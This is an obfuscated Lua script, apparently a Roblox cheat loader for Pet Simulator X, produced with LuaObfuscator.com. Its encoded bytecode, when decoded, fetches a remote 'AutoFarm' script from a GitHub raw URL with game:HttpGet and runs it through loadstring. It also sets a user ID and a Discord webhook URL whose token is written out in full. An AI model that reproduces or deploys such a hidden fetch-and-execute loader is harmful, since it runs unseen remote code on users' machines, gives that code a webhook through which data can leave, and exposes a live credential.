--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v78=v5(v69,v19);v19=nil;return v78;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + 1)) ;return v70-(v70%(2 -1)) ;else local v71=(621 -(555 + (941 -(282 + 595))))^(v32-(932 -(857 + 74))) ;return (((v31%(v71 + v71))>=v71) and (569 -(92 + 275 + 201))) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1637 -(1523 + 114) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (364 -108)) + v36 ;end if (v35==(1065 -(68 + 997))) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -(6 + 0)) ;v35=118 -(32 + 19 + 66) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + ((1310 -(87 + 263)) -(892 + 65)) );v18=v18 + (9 -5) ;return (v41 * (31011612 -14234396)) + (v40 * 65536) + (v39 * (469 -213)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1,15 + 5 ) * (2^(78 -46))) + v42 ;local v46=v20(v43,16 + 5 ,31);local v47=((v20(v43,127 -95 )==(953 -(802 + 150))) and  -(2 -1)) or ((792 -(368 + 423)) -0) ;if (v46==(0 + 0)) then if (v45==((3133 -2136) -(915 + (100 -(10 + 8))))) then return v47 * (0 -0) ;else local v79=0 -0 ;while true do if (v79==0) then v46=1 + 0 ;v44=0 -0 ;break;end end end elseif (v46==(3234 -(1069 + 118))) then return ((v45==((442 -(416 + 26)) -(0 -0))) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^52))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v67=1 + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((8 -5)~=v51) then else local v72=0;while true do if ((0 + 0)==v72) then v58=nil;v59=nil;v72=1 -0 ;end if (v72==1) then v51=6 -2 ;break;end end end if (v51==(5 -3)) then local v73=580 -(361 + 219) ;while true do if (v73==1) then v51=323 -(53 + 267) ;break;end if (v73~=(0 + 0)) then else v56=nil;v57=nil;v73=1;end end end if (v51==1) then v54=nil;v55=nil;v51=6 -4 ;end if (v51==(732 -(16 + 716))) then local v74=0;while true do if (v74==(413 -(15 + 398))) then v52=0;v53=nil;v74=983 -(18 + 964) ;end if (v74~=(3 -2)) then else v51=286 -(175 + 110) ;break;end end end if ((9 -5)==v51) then while true do if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2 + 0 ;end if (v52==(9 -7)) then local v96=850 -(20 + 830) ;while true do if ((1 + 0)==v96) then v52=3;break;end if ((126 -(116 + 10))~=v96) then else v57=nil;v58=nil;v96=1;end end end if (v52~=3) then else v59=nil;while true do local v98=0 + 0 ;local v99;local v100;while true do if (1==v98) then while true do if (v99==(0 + 0)) then v100=0;while true do if (v100==(1061 -(810 + 251))) then local v111=738 -(542 + 196) ;local v112;while true do if (v111==(0 + 0)) then v112=0 -0 ;while true do if ((0 + 0)==v112) then local v164=0 + 0 ;while true do if (v164==1) then v112=1 + 0 ;break;end if (v164~=(0 + 0)) then else if (v53==(7 -5)) then local v169=859 -(240 + 619) ;local v170;while true do if (v169~=(0 -0)) then else v170=0 -0 ;while true do if (v170~=(1551 -(1126 + 425))) then else local v175=405 -(118 + 287) ;while true do if (v175~=1) then else v170=3 -2 ;break;end if (v175~=(1121 -(118 + 1003))) then else for v183=2 -1 ,v58 do local v184=377 -(142 + 235) ;local v185;local v186;local v187;local v188;while true do if (v184==2) then while true do if (v185==(405 -(255 + 150))) then local v197=0;while true do if (v197==(1 + 0)) then v185=1 + 0 ;break;end if (v197==0) then v186=0 -0 ;v187=nil;v197=4 -3 ;end end end if ((1 + 0)~=v185) then else v188=nil;while true do if ((977 -(553 + 424))~=v186) then else local v201=0 -0 ;while true do if (v201==(1 + 0)) then v186=1 + 0 ;break;end if (v201~=0) then else v187=v21();v188=nil;v201=1 + 0 ;end end end if (v186==(1 -0)) then if (v187==1) then v188=v21()~=(0 + 0) ;elseif (v187==(2 + 0)) then v188=v24();elseif (v187==(6 -3)) then v188=v25();end v59[v183]=v188;break;end end break;end end break;end if ((0 -0)==v184) then v185=0 -0 ;v186=nil;v184=1;end if (v184==(1 + 0)) then v187=nil;v188=nil;v184=9 -7 ;end end end v57[756 -(239 + 514) ]=v21();v175=1 + 0 ;end end end if (v170==1) then for v176=1,v23() do local v177=1329 -(797 + 532) ;local v178;local v179;while true do if (v177==(0 + 0)) then local v189=0 + 0 ;local v190;while true do if ((0 -0)~=v189) then else v190=0;while true do if (v190==(1203 -(373 + 829))) then v177=732 -(476 + 255) ;break;end if (v190~=(0 -0)) then else local v198=1493 -(711 + 782) ;while true do if (v198==(1131 -(369 + 761))) then v190=1 + 0 ;break;end if (v198==(0 -0)) then v178=0 -0 ;v179=nil;v198=1 + 0 ;end end end end break;end end end if (v177~=(1820 -(580 + 1239))) then else while true do if ((238 -(64 + 174))==v178) then v179=v21();if (v20(v179,1 + 0 ,1 + 0 )~=(0 -0)) then else local v191=0 + 0 ;local v192;local v193;local v194;local v195;while true do if (0~=v191) then else local v199=336 -(144 + 192) ;local v200;while true do if (v199==(216 -(42 + 174))) then v200=0 + 0 ;while true do if (v200==(0 + 0)) then local v216=0 + 0 ;while true do if ((1167 -(645 + 522))~=v216) then else v192=0;v193=nil;v216=1505 -(363 + 1141) ;end if (v216==1) then v200=1791 -(1010 + 780) ;break;end end end if (v200~=(1 + 0)) then else v191=1581 -(1183 + 397) ;break;end end break;end end end if (v191==2) then while true do if (v192~=1) then else local v205=0 -0 ;local v206;while true do if (v205==(0 -0)) then v206=0 -0 ;while true do if (v206==0) then local v217=1836 -(1045 + 791) ;local v218;while true do if (v217==0) then v218=0 + 0 ;while true do if (v218==(2 -1)) then v206=1 + 0 ;break;end if (v218==(505 -(351 + 154))) then local v223=1574 -(1281 + 293) ;while true do if (v223==(1975 -(1913 + 62))) then v195={v22(),v22(),nil,nil};if (v193==(1559 -(1381 + 178))) then local v226=0 + 0 ;local v227;local v228;while true do if (v226==(0 -0)) then v227=0;v228=nil;v226=1662 -(1477 + 184) ;end if ((1 + 0)~=v226) then else while true do if (v227==(0 -0)) then v228=0 + 0 ;while true do if (v228==(470 -(381 + 89))) then v195[3 -0 ]=v22();v195[4 + 0 ]=v22();break;end end break;end end break;end end elseif (v193==1) then v195[859 -(564 + 292) ]=v23();elseif (v193==(2 + 0)) then v195[4 -1 ]=v23() -((5 -3)^(320 -(244 + 60))) ;elseif (v193==3) then local v235=0 + 0 ;local v236;while true do if (v235~=(476 -(41 + 435))) then else v236=1156 -(1074 + 82) ;while true do if (v236~=(0 -0)) then else v195[1004 -(938 + 63) ]=v23() -((1457 -(990 + 465))^(13 + 3)) ;v195[1129 -(936 + 189) ]=v22();break;end end break;end end end v223=1 + 0 ;end if (v223==(1 + 0)) then v218=1614 -(1565 + 48) ;break;end end end end break;end end end if (v206~=(1 + 0)) then else v192=1728 -(1668 + 58) ;break;end end break;end end end if (v192~=(1141 -(782 + 356))) then else if (v20(v194,270 -(176 + 91) ,5 -2 )==(2 -1)) then v195[5 -1 ]=v59[v195[1096 -(975 + 117) ]];end v54[v176]=v195;break;end if ((1875 -(157 + 1718))==v192) then local v208=0 + 0 ;local v209;local v210;while true do if (v208==(1 + 0)) then while true do if (v209==(0 + 0)) then v210=0 -0 ;while true do if (v210==(1995 -(109 + 1885))) then v192=1470 -(1269 + 200) ;break;end if (v210~=(0 -0)) then else local v219=0 -0 ;local v220;while true do if (v219~=(815 -(98 + 717))) then else v220=0;while true do if (1==v220) then v210=1;break;end if (v220~=(0 -0)) then else local v224=0;while true do if ((826 -(802 + 24))~=v224) then else v193=v20(v179,1020 -(697 + 321) ,7 -4 );v194=v20(v179,8 -4 ,10 -4 );v224=2 -1 ;end if (v224==(1 + 0)) then v220=1 + 0 ;break;end end end end break;end end end end break;end end break;end if (v208==(0 + 0)) then v209=0 -0 ;v210=nil;v208=1;end end end if (v192==2) then local v211=0 -0 ;local v212;local v213;while true do if (v211==(1228 -(322 + 905))) then while true do if (v212==0) then v213=611 -(602 + 9) ;while true do if (v213==(2 -1)) then v192=9 -6 ;break;end if (v213~=(0 + 0)) then else local v221=0 + 0 ;local v222;while true do if (v221~=(1189 -(449 + 740))) then else v222=0;while true do if ((872 -(826 + 46))==v222) then local v225=947 -(245 + 702) ;while true do if (v225~=0) then else if (v20(v194,3 -2 ,1434 -(797 + 636) )~=(1 + 0)) then else v195[1621 -(1427 + 192) ]=v59[v195[1900 -(260 + 1638) ]];end if (v20(v194,442 -(382 + 58) ,4 -2 )==(1 + 0)) then v195[9 -6 ]=v59[v195[3 + 0 ]];end v225=327 -(192 + 134) ;end if (v225==(1 -0)) then v222=1;break;end end end if ((2 -1)~=v222) then else v213=1206 -(902 + 303) ;break;end end break;end end end end break;end end break;end if (v211~=(1276 -(316 + 960))) then else v212=0 + 0 ;v213=nil;v211=1;end end end end break;end if (v191==1) then v194=nil;v195=nil;v191=3 -1 ;end end end break;end end break;end end end v53=3 + 0 ;break;end end break;end end end if (v53~=3) then else local v171=0 -0 ;local v172;local v173;while true do if (v171==(0 + 0)) then v172=1690 -(1121 + 569) ;v173=nil;v171=215 -(22 + 192) ;end if (v171==1) then while true do if (v172~=(683 -(483 + 200))) then else v173=1463 -(1404 + 59) ;while true do if (v173~=(1806 -(1202 + 604))) then else local v181=0;local v182;while true do if (v181==0) then v182=0;while true do if (v182==(0 -0)) then local v196=0 -0 ;while true do if (v196==(0 -0)) then for v203=766 -(468 + 297) ,v23() do v55[v203-1 ]=v28();end return v57;end end end end break;end end end end break;end end break;end end end v164=1;end end end if (v112==(563 -(334 + 228))) then v100=3 -2 ;break;end end break;end end end if ((2 -1)==v100) then if (v53==1) then local v151=0 -0 ;local v152;while true do if (v151~=(0 + 0)) then else v152=236 -(141 + 95) ;while true do if (v152~=1) then else v59={};v53=2;break;end if (v152==(0 + 0)) then local v165=0 + 0 ;local v166;while true do if (v165~=0) then else v166=0 -0 ;while true do if (v166==(0 -0)) then v57={v54,v55,nil,v56};v58=v23();v166=1 + 0 ;end if (v166==1) then v152=1773 -(1733 + 39) ;break;end end break;end end end end break;end end end if ((0 + 0)==v53) then local v153=0 -0 ;local v154;while true do if (v153~=(1034 -(125 + 909))) then else v154=0 + 0 ;while true do if (0~=v154) then else local v167=163 -(92 + 71) ;local v168;while true do if (v167==(0 -0)) then v168=0 + 0 ;while true do if (v168==(513 -(409 + 103))) then v154=1 + 0 ;break;end if ((0 -0)==v168) then local v174=765 -(574 + 191) ;while true do if (v174~=0) then else v54={};v55={};v174=1;end if ((1 + 0)~=v174) then else v168=1;break;end end end end break;end end end if (v154==(2 -1)) then v56={};v53=1 + 0 ;break;end end break;end end end break;end end break;end end break;end if (v98==(849 -(254 + 595))) then v99=0;v100=nil;v98=1318 -(1114 + 203) ;end end end break;end if (v52==(726 -(228 + 498))) then local v97=0 + 0 ;while true do if (v97~=(127 -(55 + 71))) then else v52=1 -0 ;break;end if ((1790 -(573 + 1217))~=v97) then else local v107=0 -0 ;while true do if (v107==0) then v53=0 + 0 ;v54=nil;v107=2 -1 ;end if (v107==(1 -0)) then v97=940 -(714 + 225) ;break;end end end end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (1==v63) then v66=v60[3];return function(...)local v80=v64;local v81=v65;local v82=v66;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v95=0;while true do if (v95==1) then if (v93<=5) then if (v93<=2) then if (v93<=0) then v90[v92[2]]=v62[v92[3]];elseif (v93>1) then local v113;local v114,v115;local v116;local v117;v90[v92[2]]=v62[v92[3]];v84=v84 + 1 ;v92=v80[v84];v117=v92[2];v116=v90[v92[3]];v90[v117 + 1 ]=v116;v90[v117]=v116[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v117=v92[2];v114,v115=v83(v90[v117](v13(v90,v117 + 1 ,v92[3])));v85=(v115 + v117) -1 ;v113=0;for v147=v117,v85 do local v148=0;while true do if (v148==0) then v113=v113 + 1 ;v90[v147]=v114[v113];break;end end end v84=v84 + 1 ;v92=v80[v84];v117=v92[2];v90[v117]=v90[v117](v13(v90,v117 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];else v90[v92[2]][v92[3]]=v92[4];end elseif (v93<=3) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93>4) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v62[v92[3]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v84=v92[3];else local v136=v92[2];local v137,v138=v83(v90[v136](v13(v90,v136 + 1 ,v92[3])));v85=(v138 + v136) -1 ;local v139=0;for v149=v136,v85 do local v150=0;while true do if (v150==0) then v139=v139 + 1 ;v90[v149]=v137[v139];break;end end end end elseif (v93<=8) then if (v93<=6) then v84=v92[3];elseif (v93==7) then local v140=v92[2];v90[v140]=v90[v140](v13(v90,v140 + 1 ,v85));else local v142=0;local v143;local v144;while true do if (v142==1) then v90[v143 + 1 ]=v144;v90[v143]=v144[v92[4]];break;end if (v142==0) then v143=v92[2];v144=v90[v92[3]];v142=1;end end end elseif (v93<=9) then v90[v92[2]]();elseif (v93>10) then v90[v92[2]]=v92[3];else do return;end end v84=v84 + 1 ;break;end if (v95==0) then v92=v80[v84];v93=v92[1];v95=1;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756103023O005F4703063O00557365724944022O0020F77C78EC4103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O333734332O36353332383639373531342F77684D743336696257636F754C694F68545842504558755363704C6E464F482O307A304C707435575F7142773439347A72514E3273347079524C32716F68677858786B4B00143O00120B3O00013O0026033O000B000100020004063O000B000100122O000100033O001202000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026033O0001000100010004063O0001000100122O000100073O00300500010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O000A3O00017O00",v9(),...);
